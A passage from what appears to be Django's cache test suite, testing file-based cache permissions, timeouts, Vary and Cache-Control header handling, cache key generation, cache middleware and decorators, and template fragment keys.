)
def test_cache_dir_permissions(self):
os.rmdir(self.dirname)
dir_path = Path(self.dirname) / 'nested' / 'filebasedcache'
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = dir_path
setting_changed.send(self.__class__, setting='CACHES', enter=False)
cache.set('foo', 'bar')
self.assertIs(dir_path.exists(), True)
tests = [
dir_path,
dir_path.parent,
dir_path.parent.parent,
]
for directory in tests:
with self.subTest(directory=directory):
dir_mode = directory.stat().st_mode & 0o777
self.assertEqual(dir_mode, 0o700)
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=OSError):
with self.assertRaises(OSError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
class FileBasedCachePathLibTests(FileBasedCacheTests):
def mkdtemp(self):
tmp_dir = super().mkdtemp()
return Path(tmp_dir)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_only_initialized(self):
with self.settings(CACHES={
'cache_1': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
'cache_2': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
}):
self.assertEqual(caches.all(initialized_only=True), [])
signals.request_finished.send(self.__class__)
self.assertEqual(caches.all(initialized_only=True), [])
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
    Cache settings that define TIMEOUT=None create caches that set
    non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
    default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
    a non-expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = update_cache if update_cache else True
return request
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('*', ('Accept-Language', 'Cookie'), '*'),
('Accept-Language, Cookie', ('*',), '*'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
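    # Note: the learned key has the form
    # 'views.decorators.cache.cache_page.<key_prefix>.<method>.<url hash>.<headerlist hash>';
    # d41d8cd98f00b204e9800998ecf8427e is the hash of empty input, i.e. no Vary
    # headers were learned for this response.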
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response.headers['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# no-cache.
('', {'no_cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('', {'no-cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('no-cache=Set-Cookie', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie,no-cache=Link', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie', {'no_cache': 'Link'}, {'no-cache=Set-Cookie', 'no-cache=Link'}),
(
'no-cache=Set-Cookie,no-cache=Link',
{'no_cache': 'Custom'},
{'no-cache=Set-Cookie', 'no-cache=Link', 'no-cache=Custom'},
),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response.headers['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response.headers['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
return UpdateCacheMiddleware(lambda req: HttpResponse(msg))(request)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
def get_response(req):
return HttpResponse(msg)
translation.activate(lang)
return UpdateCacheMiddleware(get_response)(request)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
content = 'Check for cache with QUERY_STRING'
def get_response(req):
return HttpResponse(content)
UpdateCacheMiddleware(get_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
        # change the language again
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
        # change the language again
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
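        # The en/es round trip above works because learn_cache_key() includes the
        # active language in the key when USE_I18N is True, so each language gets
        # its own cached copy of the page.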
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
def get_stream_response(req):
return StreamingHttpResponse(['Check for cache with streaming content.'])
UpdateCacheMiddleware(get_stream_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
        Ensure the constructor correctly distinguishes between CacheMiddleware
        used as middleware and CacheMiddleware used as a view decorator, and
        sets its attributes appropriately.
"""
# If only one argument is passed in construction, it's being used as
# middleware.
middleware = CacheMiddleware(empty_response)
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
# If more arguments are being passed in construction, it's being used
# as a decorator. First, test with "defaults":
as_view_decorator = CacheMiddleware(empty_response, cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
self.assertEqual(as_view_decorator.cache, self.default_cache)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(
hello_world_view, cache_timeout=60, cache_alias='other', key_prefix='foo'
)
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache, self.other_cache)
def test_update_cache_middleware_constructor(self):
middleware = UpdateCacheMiddleware(empty_response)
self.assertEqual(middleware.cache_timeout, 30)
self.assertIsNone(middleware.page_timeout)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_fetch_cache_middleware_constructor(self):
middleware = FetchFromCacheMiddleware(empty_response)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_middleware(self):
middleware = CacheMiddleware(hello_world_view)
prefix_middleware = CacheMiddleware(hello_world_view, key_prefix='prefix1')
timeout_middleware = CacheMiddleware(hello_world_view, cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
        # ... but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
        # ... even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cache_page_timeout(self):
# Page timeout takes precedence over the "max-age" section of the
# "Cache-Control".
tests = [
(1, 3), # max_age < page_timeout.
(3, 1), # max_age > page_timeout.
]
for max_age, page_timeout in tests:
with self.subTest(max_age=max_age, page_timeout=page_timeout):
view = cache_page(timeout=page_timeout)(
cache_control(max_age=max_age)(hello_world_view)
)
request = self.factory.get('/view/')
response = view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
time.sleep(1)
response = view(request, '2')
self.assertEqual(
response.content,
b'Hello World 1' if page_timeout > max_age else b'Hello World 2',
)
cache.clear()
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
request = self.factory.get('/view/')
csrf_middleware = CsrfViewMiddleware(csrf_view)
csrf_middleware.process_view(request, csrf_view, (), {})
cache_middleware = CacheMiddleware(csrf_middleware)
self.assertIsNone(cache_middleware.process_request(request))
cache_middleware(request)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
    Tests various headers with TemplateResponse.

    Most are probably redundant since they manipulate the same object anyway,
    but the ETag header is 'special' because it relies on the content being
    complete (which is not necessarily always the case with a TemplateResponse).
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.493e283d571a73056196f1a68efd0f66')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.17c1a507a0cb58384f4c639067a93520')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.06c8ae8e8c430b69fb0a6443504153dc')
def test_with_ints_vary_on(self):
key = make_template_fragment_key('foo', [1, 2, 3, 4, 5])
self.assertEqual(key, 'template.cache.foo.7ae8fd2e0d25d651c683bdeebdb29461')
def test_with_unicode_vary_on(self):
key = make_template_fragment_key('foo', ['42º', '😀'])
self.assertEqual(key, 'template.cache.foo.7ced1c94e543668590ba39b3c08b0237')
def test_long_vary_on(self):
key = make_template_fragment_key('foo', ['x' * 10000])
self.assertEqual(key, 'template.cache.foo.3670b349b5124aa56bdb50678b02b23a')
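    # In all of the above, the key has the form
    # 'template.cache.<fragment_name>.<hash of the vary_on values>'; with no
    # vary_on arguments the hash is that of empty input
    # (d41d8cd98f00b204e9800998ecf8427e).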
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
def test_nonexistent_alias(self):
msg = "The connection 'nonexistent' doesn't exist."
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
caches['nonexistent']
def test_nonexistent_backend(self):
test_caches = CacheHandler({
'invalid_backend': {
'BACKEND': 'django.nonexistent.NonexistentBackend',
},
})
msg = (
"Could not find backend 'django.nonexistent.NonexistentBackend': "
"No module named 'django.nonexistent'"
)
with self.assertRaisesMessage(InvalidCacheBackendError, msg):
test_caches['invalid_backend']
def test_all(self):
test_caches = CacheHandler({
'cache_1': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
'cache_2': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
})
self.assertEqual(test_caches.all(initialized_only=True), [])
cache_1 = test_caches['cache_1']
